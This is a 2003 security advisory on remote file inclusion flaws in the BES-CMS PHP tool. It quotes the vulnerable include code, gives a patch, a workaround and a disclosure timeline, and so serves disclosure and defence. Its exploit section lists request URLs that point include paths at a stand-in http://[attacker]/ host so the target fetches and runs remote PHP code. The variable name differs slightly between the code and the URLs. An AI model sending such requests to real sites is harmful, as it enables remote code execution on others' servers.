[SCSA-024] BES-CMS including file vulnerability
======================================================================
Security Corporation Security Advisory [SCSA-024]
BES-CMS including file vulnerability
======================================================================
PROGRAM: BES-CMS
HOMEPAGE: http://bes.h6p.org
VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3
RISK: MEDIUM/HIGH
IMPACT: Including of file
RELEASE DATE: 2003-12-20
======================================================================
TABLE OF CONTENTS
======================================================================
1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK
1. DESCRIPTION
======================================================================
"Bes-cms is a professional dynamic php website building tool. It was
developped at mokka by a bored programmor. Bes-cms is capable of
creating images galeries, message boards, news sections download
sections contact sections and many more to be added on the
plugin server."
(direct quote from BES-CMS website)
2. DETAILS
======================================================================
- Including of file :
A vulnerability has been discovered in BES-CMS that allows remote
attackers to cause the script to include arbitrary PHP code
(allows remote command execution).
In : index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
we can see the following code :
----------------------------------------------------
include_once($PATH__Includes."actions_default.php");
----------------------------------------------------
In the Include/functions_folder.php file :
----------------------------------------------------
include($PATH__Includes.'functions_folder_modules.php');
include($PATH__Includes.'functions_folder_plugins.php');
include($PATH__Includes.'functions_folder_files.php');
----------------------------------------------------
In the Include/functions_hacking.php file :
----------------------------------------------------
switch($_GET['itemID'])
{
case 'usershow':
include_once("".$PATH__Includes."functions_user.php");
Show_USer_Details($_GET['user']);
break;
[...]
case 'send_bug':
if ($UserDetails['LOGGED_IN'] == 'YES')
{
global $PATH__Includes;
include_once("".$PATH__Includes."functions_error.php");
send_bug_report();
}
break;
[...]
case 'content_view':
global $PATH___Includes;
include_once("".$PATH__Includes."functions_message_docTypes.php");
Message_Centent_View($Plugin_Path);
break;
case 'logger':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_users.php");
Loggin_Message();
break;
case 'search':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_general.php");
Display_Search_Results($_POST['search_str']);
break;
[...]
----------------------------------------------------
In the Include/functions_message.php file :
----------------------------------------------------
include($PATH__Includes.'functions_message_docTypes.php');
include($PATH__Includes.'functions_message_edit.php');
----------------------------------------------------
and Include/Start.php file :
-------------------------------------------
include_once($inc_path."Include/vars.php");
-------------------------------------------
All these files are vulnerable...We can see that all inclusions of file
begin by a indefinite variable in the code ($inc_path or $PATH_Includes)
and so could be definite by an attacker.
3. EXPLOITS
======================================================================
- Including of file : (if register_globals=ON):
- http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/
Could include the file : http://[attacker]/actions_default.php
- http://[target]/Include/functions_folder.php?PATH_Includes=
http://[attacker]/
Could include the files : http://[attacker]/functions_folder_modules.php
http://[attacker]/functions_folder_plugins.php
http://[attacker]/functions_folder_files.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=logger
Could include the file : http://[attacker]/functions_user.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES
Could include the file : http://[attacker]/functions_error.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=content_view
Could include the file : http://[attacker]/functions_message_docTypes.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=search
Could include the file : http://[attacker]/functions_general.php
- http://[target]/Include/functions_message.php?PATH_Includes=
http://[attacker]/
Could include the files : http://[attacker]/functions_message_docTypes.php
http://[attacker]/functions_message_edit.php
- http://[target]/Include/Start.php?inc_path=http://[attacker]/
Could include the file : http://[attacker]/Include/vars.php
4. SOLUTIONS
======================================================================
You can found patch at the following link : http://www.phpsecure.info
The creator was notified, published a secure version (version 0.5 rc4)
5. WORKAROUND
======================================================================
In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
Include/functions_folder.php, Include/functions_hacking.php and
Include/functions_message.php simply add the following line as FIRST LINE :
-------------------------------------------
if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info");
}
-------------------------------------------
And at the begining of the Include/Start.php file, add the following line
as FIRST LINE :
------------------------------------------------------------------------
if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
------------------------------------------------------------------------
6. DISCLOSURE TIMELINE
======================================================================
13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure
7. CREDITS
======================================================================
frog-m@n <frog-man@xxxxxxxxxxxxxxxxxxxxxxxx> from
http://www.phpsecure.info is credited with this discovery
8. DISLAIMER
======================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
9. REFERENCES
======================================================================
- Original Version:
http://www.security-corporation.com/advisories-024.html
- Version Française:
http://www.security-corporation.com/index.php?id=advisories&a=024-FR
10. FEEDBACK
======================================================================
Please send suggestions, updates, and comments to:
Security Corporation
http://www.security-corporation.com
advisory@xxxxxxxxxxxxxxxxxxxxxxxx